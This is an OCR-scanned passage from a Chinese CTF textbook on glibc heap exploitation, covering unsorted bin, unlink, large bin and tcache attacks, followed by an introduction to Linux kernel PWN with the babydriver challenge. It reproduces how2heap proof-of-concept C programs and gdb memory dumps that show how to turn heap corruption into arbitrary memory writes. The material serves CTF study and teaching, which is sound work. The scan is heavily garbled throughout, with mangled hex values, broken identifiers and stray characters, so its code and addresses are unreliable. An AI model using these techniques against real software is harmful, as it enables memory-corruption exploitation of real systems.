堆 管 理 器 在 取出 victim 时 ， 向 victim 的 bk 指 针 指 向 的 内 存 写 入 了 一 个 main_arena 地 址 。 此 时 的 目标 标 
内 存 的 状态 为 : 


pwndbg> x/20gx 9x7fffffffe3d9 
9x7fffffffe3d0: 9x990099909060909 ”9x90960690969699119 
9x7fffffffe3eg: 9x969907ffff7dd1lb78 90x90067fffffffe3dg0 


如 果 申 请 的 内 存 刚 好 符合 victim 的 大 小 ， 也 就 是 if (size==nb) 条 件 满 足 ， 则 直接 返回 该 chunk， 内 
存 申 请 结束 。 这 个 过 程 就 是 Unsorted Bin Attack， 通 过 修改 Unsorted Bin 的 bk 地 址 ， 指 向 目标 内 存 
的 向 上 0x10 偏 移 处 写 入 main arena 的 地 址 。 (因为 在 写 入 操作 为 bck->fd=unsorted chunks ( 

) ， 即 * (bk+0x10) =unsorted chunks (av) ， 所 以 是 0x10 大 小 的 偏 移 。) a 


这 个 条 件 不 满足 时 ， 则 进入 下 面 的 流程 。 在 后 面 的 操作 中 ， 堆 管理 器 把 Unsorted Bin 中 的 bin 按 照 大 
小 分 别 存储 到 Small Bin 和 Large Bin 中 。 对 Small Bin 的 处 理 逻 辑 比 较 简单 : 


victim_index = smallbin_index (size); 
bck = bin_at (av, victim_index); 
fwd = bck->fd; 


mark_bin(av, victim_index); 
victim->bk = bck; 
victim->fd = fwd; 
fwd->bk = victim; 
bck->fd = victim; 


先 获取 对 应 大 小 的 Bin 链 ， 再 插 到 其 头 部 。 


对 Large Bin 的 处 理 比 较 复 杂 ， 我 们 将 在 后 面 的 内 容 中 详细 齐 解 其 处 理 逻 辑 。 


此 时 ，victim 的 chunk 已 经 被 放 入 smallbins 中 : 


第 一 个 循环 结束 后 ， 重 新 回 到 循环 的 开头 ， 此 时 获取 的 victim 为 目标 枝 地 址 ，bck 为 victim 的 bk 指 针 
指向 的 地 址 。 注 意 ，bck 必 须 是 一 个 合法 的 地 址 ， 因 为 在 把 新 的 victim 从 Unsorted Bin List 取 出 时 ， 
会 往 bck 指 向 的 地 址 写 入 main_arena 地 址 。 如 果 bck 指 向 内 存 不 合法 ， 就 会 导致 地 址 非法 写 入 导致 程 
序 终止 退出 。 


/* remove from unsorted list */ 
unsorted_chunks (av)->bk = bck; 
bck->fd = unsorted_chunks (av); 


然后 判断 chunk 大 小 : 


这 里 ，victim 的 大 小 与 我 们 申请 的 大 小 一 致 ， 所 以 设置 好 chunk 信 息 和 直接 返回 victim 指 向 的 内 存 ， 也 
束 是 目标 栈 地 址 。 


if (size == nb) { 
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set_inuse_bit_at_offset (victim, size); 

if (av != &main_arena) 
set_non_main_arena (victim); 

check_malloced_chunk (av, victim, nb); 

void *p = chunk2mem (victim); 

alloc_perturb (p, bytes); 

return p; 


6.6.3.4 Unlink 攻 击 


当 一 个 Bin 从 Bin List 中 删除 时 ， 就 会 触 上 友 unlink 操 作 ， 也 就 是 双 链 表 的 取出 操作 。Glibc 中 unlink 操 作 
的 代码 逻辑 不 是 很 复杂 ， 但 是 触 帮 的 环境 很 多 ， 如 防止 堆 内 存 碎片 化 ， 在 遇 到 相 邻 的 空闲 内 存 进 行 合 
并 时 会 触 上 友 Unlink， 或 者 找到 合适 的 内 存 从 双 链 表 中 取出 时 触 上 友 Unlink，malloc_consolidate 时 触 上 
Unlink 等 。Glibc 中 Unlink 的 源 代 码 如 下 : 


/* Take a chunk off a bin List */ 
#define unlink(AV, P, BK, FD) { 
FD = Pp->fd; 
BK = Pp->bk; 
if (__builtin_expect (FD->bk != P || BK->fd != P，0)) NN 
malloc_printerr (check_action, "corrupted double-linked list", P, AV); \ 
else { \ 
FD->bk = BK; \ 
BK->fd = FD; \ 
if (!in_smaLLbin_range (chunksize_nomask (P)) \ 
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { AN 
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P，0) \ 
|| __builtin_expect (P->bk_nextsize->fd_nextsize != Pp, 6)) \ 
malloc_printerr (check_action, "corrupted double-linked List (not small)", Pp, AV)\ 
if (FD->fd_nextsize == NULL) { \ 
if (P->fd_nextsize == Pp) \ 
FD->fd_nextsize = FD->bk_nextsize = FD; 
else { 
FD->fd_nextsize = P->fd_nextsizei 
FD->bk_nextsize = P->bk_nextsize; 
P->fd_nextsize->bk_nextsize = FD; 
P->bk_nextsize->fd_nextsize = FD; 
} NW 
} 
else { 
P->fd_nextsize->bk_nextsize = PpP->bk_nextsize; 
P->bk_nextsize->fd_nextsize = PpP->fd_nextsize; 
NN 
\ 


\ 


Unlink 在 处 理 双 链 表 时 是 一 个 非常 基础 的 操作 ， 检 查 也 比较 严格 ， 检 查 了 双 链 表 的 完整 性 。 但 是 我 们 
仍然 可 以 通过 指针 混淆 来 绕 过 检查 最 后 实现 任意 地 址 写 来 辅助 漏洞 利用 。 下 面 用 how2heap 项 目 中 关 
于 Unlink 的 样 例 代 码 来 讲解 如 何 利 用 Unlink 操 作 实现 任意 内 存 写 。 


#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <stdint.h> 


uint64_t *chunkO_ptr; 


int main() { 
fprintf(stderr, "Welcome to unsafe unlink 2.0!\n"); 
fprintf(stderr, "Tested in Ubuntu 14.94/16.694 6dbit.\n"); 
fprintf(stderr, "This technique can be used when you have a pointer at a known location 
to a region you can call unlink on.\n"); 
fprintf(stderr, "The most common scenario is a vulnerable buffer that can be overflown 
and has a global pointer.\n"); 


int malloc_size = 9x89; //we want to be big enough not to use fastbins 
int header_size = 2; 


fprintf(stderr, "The point of this exercise is to use free to corrupt the global 
chunk9_ptr to achieve arbitrary memory write.\n\n"); 


chunk9_ptr = (uint64_t*) malloc(malloc_size); //chunke 

uint64_t *chunkl_ptr = (uint64_tw) malloc(malloc_size); //chunkl 

fprintf(stderr, "The global chunk6_ptr is at %p, pointing to %p\n", SchunkO_ptr, chunkO_ptr); 
fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunkl_ptr); 


fprintf(stderr, "We create a fake chunk inside chunk@.\n"); 
fprintf(stderr, "We setup the 'next_free_chunk' (fd) of our fake chunk to point near 
to &chunk9_ptr so that P->fd->bk = Pp.\n"); 
chunk6_ptr[2] = (uint64_t) &chunkO_ptr-(sizeof(uint6d_t)*3); 
fprintf(stderr, "We setup the 'previous_free_chunk' (bk) of our fake chunk to point 
near to gchunke_ptr so that P->bk->fd = Pp.\n"); 
fprintf(stderr, "With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != Pp) = False\n"); 
chunk6_ptr[3] = (uint64_t) &chunkO_ptr-(sizeof(uint6d_t)*2); 
fprintf(stderr, "Fake chunk fd: %p\n", (void*) chunk9_ptr[2]); 
fprintf(stderr, "Fake chunk bk: %p\n\n", (void*) chunke_ptr[3]); 
fprintf(stderr, "We assume that we have an overflow in chunk6 so that we can freely 
change chunkl metadata.\n"); 
uint64_t *chunkl_hdr = chunkl_ptr -~ header_sizei 
fprintf(stderr, "We shrink the size of chunke (saved as 'previous_size' in chunkl) so 
that free will think that chunk9 starts Where we placed our fake chunk.\n"); 
fprintf(stderr, "It's important that our fake chunk begins exactly where the known 
pointer points and that we shrink the chunk accordingly\n"); 
chunkl_hdr[9] = malloc_size; 
fprintf(stderr, "If we had ‘normally' freed chunk8, chunkl.previous_size would have 
been Ox90, however this is its new value: %p\n",(void*)chunkl_hdr[9]); 


fprintf(stderr, "We mark our fake chunk as free by setting 'previous_in_use' of chunkl 


as False.\n\n"); 
chunkl_hdr[1] &= ~1; 


fprintf(stderr, "Now we free chunkl so that consolidate backward will unlink our fake 
chunk, overwriting chunk9_ptr.Nn") ; 
fprintf(stderr, "You can find the source of the unlink macro at 
https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c; 
=efg64369b918bcecal424482c6db693cc5ec99c3e00;hb=07c18a008c2ed8f5660adba2b778671 
db159a141#L134U4NnNn" ) ; 
free(chunkl_ptr); 


fprintf(stderr, "At this point we can use chunkO_ptr to overwrite itself to point to 
an arbitrary location.\n"); 

char victim_string[8]; 

strcpy(victim_string, "Hello!~"), 

chunk9_ptr[3] = (uint64_t) victim_string; 
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用 GDB 调 试 本 样 例 代码 ， 在 第 46 


此 时 程序 扒 内 人 存 的 排 布 情况 如 下 : 


9x603000 : 
OQx603010: 
OQx603020: 
Qx603030: 
Ox603040: 
9x603050 : 
OQx603060: 
9x603070 : 
Qx603080: 
Ox603090: 
Qx6030a0: 
Qx6030b0: 
OQx6030c0: 
QOx6030d0: 
OQx6030e0: 
Ox6030f0: 
Qx603100: 
OQx603110: 
Qx603120: 


地 址 0x603090 指 向 的 chunk 是 一 个 待 被 释放 的 chunk， 从 它 的 头 信息 可 以 看 出 ， 它 的 上 一 个 chunk 


fprintf(stderr， 


fprintf(stderr, 


chunko_ptr[9] = Ox4141414142424242LL; 


fprintf(stderr, 


pwndbg> b 46 


行 设置 断 点 : 


Note: breakpoint 2 also set at pc 6x4009b9 . 
Breakpoint 1 at Qx4009b9: file glibc_2.25/unsafe_unlink.c, line 46. 


Qx0Q0000000000000060 
OQxO000000000000000 
OQxO000000000602058 
QxO000000000000000 
OQxO000000000000000 
QxQ000000000000000 
OQxO000000000000000 
OQxO000000000000000 
Qx0000000000000000 
OxO000000000000080 
OQxQ000000000000000 
OQxO000000000000000 
OxO000000000000000 
QxQ000000000000000 
OQxO000000000000000 
OQxO000000000000000 
OQxO000000000000000 
OxO000000000000000 
QxO000000000000000 


QOx0000000090000991 
OxQ0000000000000009 
Ox0000000000602960 
OQxQQ00000000000000 
OxQ000000000000000 
QOxQ000000000000900 
OxQ000000000000000 
Ox0000000000000000 
OxQ000000000000000 
OxQ000000000000090 
OxQ000000000000000 
OQxQ000000000000000 
OxQ0000000000000009 
OQxQ000000000000000 
OxQ0000000000000009 
OQxQ0000000000009000 
OxQ000000000000000 
OxQ000000000000000 
OQxQ000000000020eel 


是 处 于 释放 状态 的 ， 并 且 大 小 为 0x80。 


if 


(!prev_inuse(p)) { 
prevsize = p->prev_size; 
size += prevsize; 
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"chunkO_ptr is now pointing where we want, we use 让 to overwrite our 


victim string.\n"); 


"Original value: %s\n", victim_string); 


"New Value: %s\n", victim_string), 


p= chunk_at_offset(p, -((long) prevsize)); 


unlink(av, p, bck, fwd); 


所 以 在 0x603090 这 个 chunk 被 释放 时 ， 检 查 到 prev_inuse 位 为 0， 则 将 它 的 前 一 个 chunk 从 链表 中 ew 
UNIIMN 
， 然 后 合并 成 一 个 chunk。 此 时 ，p 指 向 的 chunk 的 地 址 为 0x603010， 也 就 是 &chunk0_ptr， 所 


以 p 的 fd 指向 0x602058， 即 &chunk0 ptr- (sizeof (uint64 t) *3) : 


pwndbg> x/20gx QOx602058 
9x662058: 9x90900060000006066 9x69097ffff7dd2549 
Ox602068: 9x9909099009009996 9x9999909999693019 


bk 指 向 0x602060， 即 &chunk0 ptr- (sizeof (uint64 t) *2) : 


pwndbg> x/20gx 9x6692069 
Qx602060: 9x99067ffff7dd2546 9x9909909999009669 
9x602076 <chunk69_ptr>: 0x00660090996036910 69x96600990660696660 


当 按 照 这 样 的 内 存 排 布设 置 好 内 存 后 ， 束 可 以 绕 过 unlink 的 第 一 个 检查 : 


然后 指向 解 链 操作 : 


FD->bk = BK; 
BK->fd = FD; 


以 其 操作 为: 


*(Qx602058+0x18) = Qx602060 


*(Qx602060+0x10) = 9x602058 


此 时 观察 chunk0_ptr 的 信息 ， 可 以 友 现 其 值 被 改写 为 了 0x602058， 即 存储 chunk0_ptr 信 息 的 偏 移 0 
x18 大 小 的 地 址 ， 


pwndbg> print &chunkO_ptr 

$8 = (uint64_t *x) 9x692076 <chunk9_ptr> 
pwndbg> print chunk9_ptr 

$9 = (Cuint64_t *) Ox602058 

chunk9_ptr[3] = (uint64_t) victim_string; 
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这 里 直接 将 chunk0_ptr 的 指针 内 容 直 接 履 善 为 victim_string 的 地 址 。 此 时 ，chunk0_ptr 指 向 的 信息 
wl 


pwndbg> print chunkg_ptr 
$10 = (uint64_t *) 9x7fffffffe410 


这 样 ， 我 们 束 完 成 了 Unlink 攻 击 。 


从 Unlink 的 代码 中 可 以 看 到 ，Unlink 在 处 理 Large Bin 时 ， 如 果 


builtin_expect(P->fd_nextsize->bk_nextsize != Pp, 0) 
builtin_expect(P->bk_nextsize->fd_nextsize != Pp, 0) 


那么 这 两 个 检查 不 通过 ， 会 触 友 


然后 继续 进行 下 面 的 操作 ， 也 残 是 链表 解 链 操作 。 观 察 malloc _ printerr 的 代码 : 


static void malloc_printerr (int action, const char *str, void *ptr，mstate ar_ptr) { 
/* Avoid using this arena in future. We do not attempt to synchronize this with 
anything else because we minimally want to ensure that __Libc_message gets its 
resources safely without stumbling on the current corruption. */ 
if (ar_ptr) 
set_arena_corrupt (ar_ptr); 


if ((action & 5) == 5) 

__Libc_message (action & 2, "%s\n", str); 
else if (action & 1) { 

char buf[2 * sizeof (uintptr_t) + 1]; 


buf[sizeof (buf) - 1] = '\Q' 
char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 09); 
while (cp > buf) 

=p = "0', 


__Libc_message (action & 2，"xxx Error in ‘%s': %s: Qx%s x*xx\n", 
__Libc_argv[69] ? : "<unknown>", str, cp); 
} 
else if (action & 2) 
abort (); 
} 
void __libc_message(enum __Libc_message_action action, const char *fmt, ...) { 


if ((action & do_abort)) { 
if ((action & do_backtrace)) 
BEFORE_ABORT(do_abort, written, fd); 
// Kill the application. 
abort(); 
1 
小 


只 要 action&2! =1， 就 不 会 因为 abort 而 导致 程 序 终止 ， 如 果 满 足 if ( (action&5) ==5) ， 则 
malloc 
_Pprinterr 还 会 打印 错误 信息 ， 从 而 获得 地 址 信息 。 


在 malloc_printerr 不 终止 程序 的 情况 下 ， 利 用 large bin 的 解 链 操作 可 以 获得 一 次 任意 地 址 写 的 机 会 。 
读者 可 以 自己 结合 源码 实验 。 


6.6.3.5 Large Bin Attack(OCTF heapstormll) 


在 处 理 Large Bin 时 ， 堆 管 a Bin 的 大 小 ， 用 fd _nextsize 和 bk nextsize 按 大 小 排 
EES 
OW 
2heap 项 目的 large_bin_attack 介 绍 这 种 缺陷 和 利用 方法 。 


#include<stdio,h> 
#include<stdlib.h> 


int main() { 
fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned 
1o stack\n"); 
fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, 
Such as rewriting the global variable global_mx_fast in libe for further fastbin attack\n\n"); 


unsigned long stack_varl = 9; 
unsigned Long stack_var2 = 9; 


fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n"); 
fprintf(stderr, "stack_varl (%p): %ld\n", &stack_varl, stack_varl); 
fprintf(stderr, "stack_var2 (%p): Wld\n\n", &stack_var2, stack_var2); 


unsigned long *pl = malloc(8x320); 
fprintf(stderr, "Now, we allocate the first large chunk on the heap at: Np\n", pl ~ 2); 


fprintf(stderr, "And allocate another fastbin chunk in order void solidating 
the next large chunk with the first large chunk es i n\n"); 
matLoc(9x29]; 


unsigned Long wp2 = matLoc(6x469) 1; 
fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n”, p2 ~- 2); 


fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating 
the next large chunk with the second large chunk during the free()\n\n"); 
malloc(0x28); 


unsigned Long wp3 = matLoc(9x496) ; 
fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n”, p3 - 2); 


fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating 
the top chunk with the third Large chunk during the freeO\n\n"); 
malloc(0x20); 


free(pl); 

free(p2); 

fprintf(stderr, "We free the first and second large chunks now and they will be inserted 
in the unsorted bin:; [ Wp < 一 > %p J\n\n", (void *)(p2 - 2), (void *)(p2[0])); 


malloc(0x90); 
fprintf(stderr, "Now, we allocate a chunk with a size snaller than the freed first 
hunk. This will nove freed second large chunk into the large bin 
pave s of the np chunk for allocation, and reinsert 
the renaining of the freed first large chunk into the unsorted bin: [ Wp J\n\n" 
(void *)((char *)pl + Ox90)); 


free(p3); 
fprintf(stderr, "Now, we free the third large chunk and it will be inserted in the 
unsorted bin: [ %p <--> %p J]\n\n”, (void w)(p3 ~- 2), (void *)(p3[9])); 


//-~---~--------VULNERABILITY~---------- 
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fprintf(stderr, "Now emulating a vulnerability that can Overwrite the freed second 


Large chunk's \"size\""" as well as its \"bk\" and \"bk_nextsize\" pointers\n"); 
fprintf(stderr, "Basically, we decrease the size of the freed second large chunk to 
force malloc to insert the freed third large chunk at the head of the large bin 
freelist. To overwrite the stack variables, we set \"bk\" to 16 bytes before 
stack_varl and \"bk_nextsize\" to 32 bytes before stack_var2\n\n"); 


p2[-1] = 9x3f1; 

p2[69] = 9; 

p2[2] = 9; 

p2[1] = (unsigned long)(&stack_varl - 2); 
p2[3] = (unsigned long)(&stack_var2 - 4); 


malloc(Qx90); 


fprintf(stderr, "Let's malloc again, so the freed third large chunk being inserted into the 
large bin freelist. During this time, targets should have already been rewritten:\n"); 


fprintf(stderr, "stack_varl (%p): %p\n", &stack_varl, (void *)stack_varl); 
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2); 


return 90; 


使 用 GDB 调 试 本 程序 ， 在 第 81 行 设置 断 点 。 此 时 程序 的 堆 内 存 排 布 如 下 : 


unsortedbin 
all: Qx6037a0 -* Qx6030a0 -* Ox7ffff7dd1lb78 (main_arena+88) *— Qx6037a0 


largebins 
Qx4O0: 9x603366 -* 9x7ffff7dd1f68 (main_arena+1096) <*— Ox603360 /* '*3°"' 


此 时 有 两 个 Unsorted Bin 和 一 个 Large Bin。large bin 是 在 74 行 malloc (90) 时 ,将 Unsorted Bin 
中 的 一 个 Large Bin 大 小 的 Bin 放 入 Large Bin 产 生 的 。 该 Large Bin 的 结构 信息 如 下 : 


9x693369: 9x9990000969099966 9x6609969666969666411 
Ox603370: 9x996067ffff7ddlf68 9x99007ffff7ddlf68 
Ox603380: 90x99060000000603366 69x60009006000663369 


由 于 目前 只 有 一 个 Large Bin， 因 此 fd_nextsize 和 bk_nextsize 都 指向 了 本 身 。 


如 下 代码 : 


p2[-1] = Qx3f1; 

p2[69] = 0; 

p2[2] = 9; 

p2[1] = (unsigned long)(&stack_varl - 2); 
p2[3] = (unsigned long)(&stack_var2 - 4); 


修改 了 Large Bin 的 结构 信息 ， 此 时 该 Large Bin 的 结构 信息 如 下 : 


9x693369: 9x9999600069009966 9x660699666606663f1 
Qx603370: 9x99099999090096066 9x99097fffffffe3e9 
9x693380: 0x9900000000009666 69x660007fffffffe3d8 


这 时 对 int_malloc 国 数 设 置 断 点 ， 然 后 进入 该 国 数 。 由 于 申请 的 内 和 存 大 小 为 0x90， 则 Unsorted Bin 
中 的 两 个 chunk 的 大 小 分 别 为 Ox410 和 和 0x290， 所 以 会 把 Unsorted Bin 中 的 两 个 chunk 放 入 各 自 大 小 
的 链 中 。 其 中 ，0x290 大 小 的 放 入 Small Bin ，0x410 大 小 的 放 入 Large Bin。 


其 中 处 理 Large Bin 的 逻辑 如 下 : 


if (in_smallbin_range (size)) { 


} 
else { // 进入 这 个 分 支 
// 获取 该 大 小 的 链表 
victim_index = Largebin_index (size); 
bck = bin_at (av, victim_index); 
fwd = bck->fdi 
// maintain Large bins in sorted order 
// 由 于 之 前 已 经 酸 放 过 一 个 9x416 大 小 的 Large bin， 因 此 该 链表 不 为 空 
if (fwd != bck) { 
// Or with inuse bit to speed comparisons 
size |= PREV_INUSE; 
// if smaller than smallest, bypass loop below 
assert (chunk_main_arena (bck->bk)); 
// 9x419 > 9x3f9 所 以 条 件 不 满足 
if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) { 
fwd = bck; 
bck = bck->bk; 
Victim->fd_nextsize = fwd->fd; 
victim->bk_nextsize = fwd->fd->bk_nextsize; 
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; 
} 
else { 
assert(chunk_main_arena (fwd)); 
while ((unsigned long) size < chunksize_nomask (fwd)) { 
fwd = fwd->fd_nextsize; 
assert(chunk_main_arena (fwd)); 
} 
if ((unsigned Long) size == (unsigned long) chunksize_nomask (fwd)) 
fwd = fwd->fd; // ALwmays insert in the second position 
else { // 进入 这 个 条 件 分 支 
Victim->fd_nextsize = fwd; 
Victim->bk_nextsize = fwd->bk_nextsize; 
fwd->bk_nextsize = victim; 
victim->bk_nextsize->fd_nextsize = victim; 
} 
bck = fwd->bk; // bck 为 另 一 个 被 写 入 的 地 址 
} 
上 
else 
Victim->fd_nextsize = victim->bk_nextsize = victim; 
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按照 构造 好 的 内 人 存 结构 信息 ， 堆 管理 器 将 新 的 Large Bin 插 入 双 链 表 : 


其 中 ，fwd 为 被 修改 后 的 Large Bin， 其 结构 信息 如 下 : 


Ox603360: 9x9996969996690996966 9x6990990966996093f1 
Qx603370: 9x9900609909699906 9x60967fffffffe3e9 
9x693380: QxQ000000000000060 9x66097fffffffe3d8 


所 以 在 执行 


Victim->bk_nextsize->fd_nextsize = victim; 


后 ， 便 在 0x00007fffffffe3d8+0x20 处 写 入 了 victim 的 地 址 。 


在 后 面 的 操作 中 : 


义 在 bck 的 0x10 偏 移 处 写 入 了 victim 的 地 址 。 


综 上 ， 利 用 Large Bin Attack 可 以 实现 在 任意 地 址 写 入 两 个 堆 地 址 。 读 者 可 以 调试 OCTF yn A 
edpstormMm 
， 这 道 题 的 预期 解法 是 利用 Large Bin Attack 在 指定 地 址 上 构造 出 一 个 chunk， 并 将 该 chunk 

插入 Unsorted Bin 中 ， 使 得 在 申请 内 存 时 可 以 直接 获得 目标 内 存 。 


6.6.3.6 Make Life Easier:tcache 


Ptmalloc2 在 Glibc 2.26 中 引入 了 tcache 机 制 ， 大 幅 提 升 了 堆 管 理 器 性 能 ， 但 同时 市 来 了 更 多 的 安全 
缺陷 。tcache 主 要 是 一 个 单 链表 的 结构 ， 分 别 使 用 tcache_put 六 数 和 tcache_get 久 数 进行 链表 的 取出 
和 插入 操作 。 


typedef struct tcache_entry { 
struct tcache_entry *next; 
} tcache_entry, 


static void 
tcache_put (mchunkptr chunk, size_t tc_idx) { 
tcache_entry x*e = (tcache_entry *) chunk2mem (chunk); 
assert (tc_idx < TCACHE_MAX_BINS); 
e->next = tcache->entries[tc_idx]; 
tcache->entries[tc_idx] = e; 
++(tcache->counts[tc_idx]); 
} 
// Caller must ensure that we know tc_idx is valid and there's available chunks to remove 
static void x*tcache_get (size_t tc_idx) { 
tcache_entry *e = tcache->entries[tc_idx]; 
assert (tc_idx < TCACHE_MAX_BINS); 
assert (tcache->entries[tc_idx] > 0); 
tcache->entries[tc_idx] = e->next; 
--(tcache->counts[tc_idx]); 
return (void *) e; 


不 同 大 小 的 chunk 使 用 不 同 的 链表 ， 每 个 链表 的 缓存 大 小 为 7， 如 果 tcache 链 表 长 度 超过 7， 则 使 用 与 
之 前 版 本 一 致 的 处 理 方 法 。 所 以 将 tcache 缓 仓 填 满 后 ， 束 可 以 利用 之 前 版 本 堆 管 理 器 的 缺陷 了 。 


tcache 的 结构 类 似 fastbin， 但 是 检查 比 fastbin 更 少 ， 利 用 起 来 更 简单 ， 没 有 fastbin 的 double free 的 


检查 ， 也 没有 fastbin 对 chunk 的 size 的 检查 。 


6.6.3.7 Glibc 2.29 的 tcache 


在 Glibc 2.29 中 ，tcache 结 构 体 中 加 入 了 key 变 量 ， 在 tcache get 时 清空 Key 变量 ， 在 tcache put 中 加 


入 key 变 量 。 
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typedef struct tcache_entry { 

struct tcache_entry *next; 

struct tcache_perthread_struct *key; // This field exists to detect double frees 
} tcache_entry; 


static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { 
tcache_entry *e = (tcache_entry *) chunk2mem (chunk); 
assert (tc_idx < TCACHE_MAX_BINS); 
// Mark this chunk as "in the tcache" so the test in _int_free will detect a double free 
e->key = tcache; 
e->next = tcache->entries[tc_idx]; 
tcache->entries[tc_idx] = 
++(tcache->counts[tc_idx]); 
上. 
// Caller must ensure that we know tc_idx is valid and there's available chunks to remove 
static __always_inline void *tcache_get (size_t tc_idx) { 
tcache_entry *e = tcache->entries[tc_idx]; 
assert (tc_idx < TCACHE_MAX_BINS); 
assert (tcache->counts[tc_idx] > 0); 
tcache->entries[tc_idx] = e->next; 
--(tcache->counts[tc_idx]); 
e->key = NULL; 
return (void *) e; 


利用 该 key 可 以 防止 直接 的 Double Free， 但 是 它 不 是 随机 数 ， 而 是 tcache 的 地 址 : 


size_t tc_idx = csize2tidx (size); 
if (tcache != NULL && tc_idx < mp_.tcache_bins) { 

// Check to see if it's already in the tcache 

tcache_entry *e = (tcache_entry *) chunk2mem (p); 

/* This test succeeds on double free. However, we don't 100% trust 让 (it also matches 
random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely 
coincidence before aborting. */ 

if (__glibc_unlikely (e->key == tcache)) { 
tcache_entry *tmp; 
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); 
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next) 
if (tmp == e) 
malloc_printerr ("free(): double free detected in tcache 2"); 


/* If we get here, it Was a coincidence. We've wasted a few cycles, but don't abort. */ 
} 
if (tcache->counts[tc_idx] < mp_.tcache_count)] { 
tcache_put(p, tc_idx); 
return; 
} 
} 


A 和 free 的 chunk 进 行 标 记 ， 这 样 防止 直接 的 Double Free。 但 是 这 样 的 缓解 措施 还 是 可 以 
易 地 被 绕 过 ， 我 们 可 以 先 将 tcache 填 满 ， 再 利用 fastbin 与 tcache 的 差异 绕 过 这 个 检查 。 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek64232b60230642e92efb54c 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


6.7 Linux 内 核 PWN 


本 节 旨 在 帮助 那些 想 学 习 Linux 内 核 PWN 却 不 知道 如 何 开始 的 读者 进入 Linux 内 核 的 世界 。 普 通 的 用 
户 空间 二 进 制 PWN 的 最 终 目 的 是 在 目标 机 器 上 执行 任意 代码 ， 而 内 核 PWN 的 最 终 目 的 是 利用 漏洞 来 
实现 在 内 核 中 执行 任意 具有 特权 权限 的 代码 。 但 是 它们 之 间 也 有 一 些 共同 点 ， 如 过 程 都 是 逆向 一 找 漏 
洞 一 利用 漏洞 。 这 三 个 过 程 造 束 了 各 自 的 门槛 ， 如 对 于 普通 二 进 制 PWN 来 说 ， 只 要 会 C 语 言 、 汇 编 ， 
就 能 逆向 C 代 码 。 逆 向 C++ 程序 则 需要 具备 使 用 C+ + 编程 语言 的 能 力 ， 其 他 语言 同 理 。 利 用 漏洞 最 需 
要 一 些 创新 性 的 思维 ,也 就 是 俗话 说 的 “灵性 ”， 这 也 是 二 进 制 安 全 中 门槛 最 高 的 一 环 。 近年 来 的 
比赛 中 ， 二 进 制 PWN 赛 题 中 出 现 的 漏洞 类 型 虽然 只 有 几 种 ， 但 是 同一 种 漏洞 在 不 同 题目 中 可 能 有 不 
同 的 利用 方式 ， 而 且 几 乎 每 年 都 会 出 现 几 种 新 型 的 利用 方法 (与 数学 考试 类 似 ) 。 内 核 空间 PWN 和 用 
户 空间 PWN 的 区 别 在 于 逆向 和 漏洞 利用 ， 而 漏洞 类 型 与 普通 的 二 进 制 PWN 相 差 不 大 。 虽 然 Linux 内 核 
是 用 C 语 言 写 的 , 但 是 逆向 内 核 驱 动 还 需要 掌握 Linux 内 核 和 驱动 的 相关 知识 。 


本 节 默 认 读 者 具有 一 定 Linux 内 核 与 驱动 的 基础 知识 。 由 于 内 核 PWN 漏 洞 利 用 的 方式 过 于 庞杂 ， 笔 者 
也 不 能 保证 面面俱到 ， 因 此 漏洞 利用 不 属于 本 节 讲 解 的 重点 。 


6.7.1 运行 一 个 内 核 


下 面 通过 一 道 简 单 的 题目 来 详细 介绍 Linux 内 核 PWN 的 解 题 过 程 。 题 目 是 2017 年 大 学 生 信 息 安 全 竞赛 
的 题目 : babydriver (题目 链接 可 以 在 网 上 自行 寻找 ) 。6.7.9 节 也 提供 了 通过 逆向 还 原 出 的 题目 源 
代码 ， 读 者 可 以 自行 修改 和 编译 。 该 题目 中 提供 的 文件 包括 : 


学 bzlmage 一 Linux 内 核 镜像 文件 。 
他 boot.sh 一 Qemu 局 动 脚本 。 
学 rootfs.cpio 一 gzip 压 缩 的 文件 系统 。 


任 安 羔 了 Qemu 且 拥有 KVM 支 持 的 操作 系统 中 ， 执 行 boot.sh 就 可 以 启动 题目 环境 了 。 


该 怎样 进行 文件 传输 呢 ? 写 好 Exp 后 ， 应 该 怎样 传 到 服务 器 上 ? 怎样 获取 服务 器 的 文件 ? 最 简单 的 方 
式 是 通过 网 络 传输 ， 但 是 在 本 题 中 ， 默 认 没 有 网 络 。 所 以 需要 在 局 动 Qemu 时 添加 如 下 网 络 参 数 : 


6.7.2 网 络 配置 


如 果 局 动 后 仍然 没有 网 络 连 接 ， 是 因为 该 内 核 没有 编译 该 类 型 网 卡 的 驱动 ， 更 改 网 卡 即 可 。 
查看 Qemu 支 持 模拟 的 网 卡 : 


本 题 的 内 核 使 用 的 网 卡 是 virtio-net-pci。 启 动 后 需要 使 用 “ifconfig eth0 up” 命令 局 动 该 网 卡 ， 
但 是 因为 该 系统 不 会 自动 使 用 DHCP 获 取 IP， 所 以 需要 手动 配置 |P。 如 果 使 用 user 模 式 ， 那 么 只 能 通 
过 外 网 IP 进 行文 件 传输 ， 所 以 建议 使 用 桥接 模式 ,: 

在 Ubuntu 环境 中 ， 可 以 通过 “apt install libvirt-bin bridge-utils virt-manager” 命 令 安装 虚拟 
网 卡 ， 其 中 virbr0 是 环境 中 虚拟 网 卡 的 名 称 。 
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6.7.3 文件 系统 


